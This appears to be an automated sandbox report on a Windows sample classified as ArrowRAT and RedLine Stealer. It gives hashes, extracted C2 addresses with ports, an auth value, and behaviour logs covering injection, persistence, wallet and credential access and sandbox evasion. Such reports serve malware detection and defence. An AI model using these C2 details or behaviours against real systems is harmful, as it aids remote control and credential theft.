arrowrat | 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4

Analysis

max time kernel
271s
max time network
181s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
11-11-2022 22:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe
Size

18.4MB
MD5

464502cbaae7b9ed1cd6da844d38ba86
SHA1

30dd42539cbfad04564f9db45ca40f2b9e81546c
SHA256

6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4
SHA512

e74b45702eeaca95bc6c9f2aeea8a5958a425dc1f45ecfb127e286a39eb668243b41e56c705ae5fe7a72ff1ab691948adf29ddd6de18509421fa415647a36b59
SSDEEP

98304:2pgc9WBd2/ojIbrK51bnqvMwqwWhWznbdyxDDFC4B14d+iXLfg0rf2a33OXA7zTg:2pgnBkbYEMUWIzbdyxDDFCXpZU

Score

10^/10

arrowrat redline @noxycloud client infostealer persistence rat spyware

Malware Config

Extracted

Family

arrowrat

Botnet

Client

213.239.219.58:1337

Mutex

nPxRArUjc

Extracted

Family

redline

Botnet

@NoxyCloud

85.192.63.57:34210

Attributes

auth_value
20dc074852db65a2b74addf964cf576e

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1924-1493-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

Quoko tace wesa.exeROR.exe

description pid process target process

PID 4292 created 2520 4292 Quoko tace wesa.exe taskhostw.exe
PID 3436 created 2520 3436 ROR.exe taskhostw.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

MRH.exeQuoko tace wesa.exeROR.exe

pid process

3836 MRH.exe
4292 Quoko tace wesa.exe
3436 ROR.exe

description	pid	process	target process
PID 4292 created 2520	4292	Quoko tace wesa.exe	taskhostw.exe
PID 3436 created 2520	3436	ROR.exe	taskhostw.exe

pid	process
3836	MRH.exe
4292	Quoko tace wesa.exe
3436	ROR.exe

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Loads dropped DLL 2 IoCs

Processes:

Quoko tace wesa.exeROR.exe

pid process

4292 Quoko tace wesa.exe
3436 ROR.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

explorer.exe

description ioc process

File opened (read-only) \??\D: explorer.exe

pid	process
4292	Quoko tace wesa.exe
3436	ROR.exe

description	ioc	process
File opened (read-only)	\??\D:	explorer.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exeQuoko tace wesa.exeInstallUtil.exeROR.exe

description	pid	process	target process
PID 2696 set thread context of 1816	2696	6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe	InstallUtil.exe
PID 4292 set thread context of 4684	4292	Quoko tace wesa.exe	InstallUtil.exe
PID 4684 set thread context of 2636	4684	InstallUtil.exe	cvtres.exe
PID 3436 set thread context of 1924	3436	ROR.exe	InstallUtil.exe

Drops file in Windows directory 3 IoCs

Processes:

explorer.exeSearchUI.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\2717123927\3950266016.pri	explorer.exe
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	SearchUI.exe
File created	C:\Windows\rescache\_merged\4032412167\2900507189.pri	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 22 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	explorer.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1864 schtasks.exe

pid	process
1864	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

SearchUI.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchUI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchUI.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 30 IoCs

Processes:

explorer.exeSearchUI.exeInstallUtil.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings	InstallUtil.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010005000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c100000000000002000000e6070b004100720067006a006200650078002000200032000a005600610067007200650061007200670020006e007000700072006600660000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000074ae2078e323294282c1e41cb67d5b9c00000000000000000000000073e26aa51bf6d80100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e6070b004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000073ae2078e323294282c1e41cb67d5b9c000000000000000000000000099a1ea51bf6d80100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e60709004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc76000000000000000000000000d137466221bed80100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e6070900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e6070900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133065238422491118"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchUI.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4016 PING.EXE

pid	process
4016	PING.EXE

Suspicious behavior: EnumeratesProcesses 56 IoCs

Processes:

AcroRd32.exeMRH.exeQuoko tace wesa.exeInstallUtil.exeROR.exeInstallUtil.exe

pid	process
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
4980	AcroRd32.exe
